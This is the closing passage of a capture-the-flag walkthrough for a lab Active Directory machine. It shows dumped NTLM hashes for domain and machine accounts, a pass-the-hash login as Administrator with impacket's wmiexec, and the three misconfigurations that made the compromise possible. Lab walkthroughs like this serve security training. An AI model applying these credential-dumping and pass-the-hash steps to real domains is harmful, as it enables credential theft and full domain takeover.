htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:9740adcc201cec79f84bf45d008cf123:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Cleaning up...
```
As we can see, we now have the Administrator's NT hash (the LM field, aad3b435b51404eeaad3b435b51404ee on every line, is just the empty LM hash, since LM hashes are no longer stored). We also have the krbtgt hash, which is why a real incident of this kind ends with a double krbtgt reset.
Getting the root flag
With the Administrator's NT hash we do not need the password at all: NTLM authentication only ever uses the hash, so we can pass it as-is (pass-the-hash). We use impacket's wmiexec.py with -hashes LMHASH:NTHASH to get a semi-interactive shell as Administrator over WMI.
```
# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 Administrator@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
```
We have it. Moving to the Administrator's desktop, there is the root flag:
```
C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is E8B0-D68E

 Directory of C:\Users\Administrator\Desktop

09/23/2019  01:15 PM    <DIR>          .
09/23/2019  01:15 PM    <DIR>          ..
09/23/2019  01:15 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  29,229,051,904 bytes free
```
That is the root flag, and the box is complete. The whole chain came down to three misconfigurations: an account with Kerberos pre-authentication disabled, a password policy that let its password be "s3rvice", and Exchange's legacy WriteDacl on the domain object reachable through nested group membership.